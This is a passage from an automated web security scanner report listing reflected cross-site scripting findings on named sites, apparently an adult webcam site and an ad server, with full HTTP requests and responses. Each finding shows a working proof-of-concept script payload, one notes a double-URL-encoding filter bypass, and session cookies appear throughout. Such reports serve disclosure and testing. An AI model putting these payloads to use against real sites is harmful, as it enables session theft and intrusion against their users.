Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:58 GMT
Connection: close
Content-Length: 23170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=39b96"><script>alert(1)</script>aa918e4b7e3&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.286. http://dk.imlive.com/waccess/ [from parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dk.imlive.com
Path:	/waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d099c"><script>alert(1)</script>1462ebc3ff2 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d099c"><script>alert(1)</script>1462ebc3ff2&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:05 GMT
Connection: close
Content-Length: 23170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d099c"><script>alert(1)</script>1462ebc3ff2&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.287. http://dk.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dk.imlive.com
Path:	/waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2babb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527730ccb26132 was submitted in the gotopage parameter. This input was echoed as 2babb'style='x:expression(alert(1))'730ccb26132 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=2babb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527730ccb26132 HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: idk=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQSTSCRD=JCBCPJMAPKIPKJHFCJIAJBAC; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:16 GMT
Connection: close
Content-Length: 8330
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=dk.imlive.com&ul=/waccess/2babb'style='x:expression(alert(1))'730ccb26132/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://dk.imlive.com:80/waccess/2babb'style='x:expression(alert(1))'730ccb26132/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.288. http://dk.imlive.com/waccess/ [promocode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dk.imlive.com
Path:	/waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c286"><script>alert(1)</script>f1e7aab618f was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA55834c286"><script>alert(1)</script>f1e7aab618f&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:53 GMT
Connection: close
Content-Length: 23170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA55834c286"><script>alert(1)</script>f1e7aab618f&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.289. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11170717655@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38595"><script>alert(1)</script>39a25e102d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM38595"><script>alert(1)</script>39a25e102d6/2010DM/11170717655@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM38595"><script>alert(1)</script>39a25e102d6/2010DM/1040289451/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.290. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11170717655@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0308"><script>alert(1)</script>e92931d1d13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMe0308"><script>alert(1)</script>e92931d1d13/11170717655@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMe0308"><script>alert(1)</script>e92931d1d13/942944445/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.291. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11170717655@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2ff"><script>alert(1)</script>f34da647acb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11170717655@x23bb2ff"><script>alert(1)</script>f34da647acb?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1461687267/x23bb2ff"><script>alert(1)</script>f34da647acb/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.292. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11170717655@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b0c1"-alert(1)-"9121c6f6f8b was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11170717655@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_3003b0c1"-alert(1)-"9121c6f6f8b HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3003b0c1"-alert(1)-"9121c6f6f8b";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.293. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11170717655@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac99f"-alert(1)-"1eef0d2354a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11170717655@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&ac99f"-alert(1)-"1eef0d2354a=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&ac99f"-alert(1)-"1eef0d2354a=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.294. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1120619784@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aa20"><script>alert(1)</script>06e269b1e1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM4aa20"><script>alert(1)</script>06e269b1e1b/2010DM/1120619784@x23?USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM4aa20"><script>alert(1)</script>06e269b1e1b/2010DM/1251469884/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.295. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1120619784@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4941c"><script>alert(1)</script>06ccdf3c634 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM4941c"><script>alert(1)</script>06ccdf3c634/1120619784@x23?USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM4941c"><script>alert(1)</script>06ccdf3c634/101209483/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.296. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1120619784@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df8e4"><script>alert(1)</script>2ff75915346 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1120619784@x23df8e4"><script>alert(1)</script>2ff75915346?USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/962173003/x23df8e4"><script>alert(1)</script>2ff75915346/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

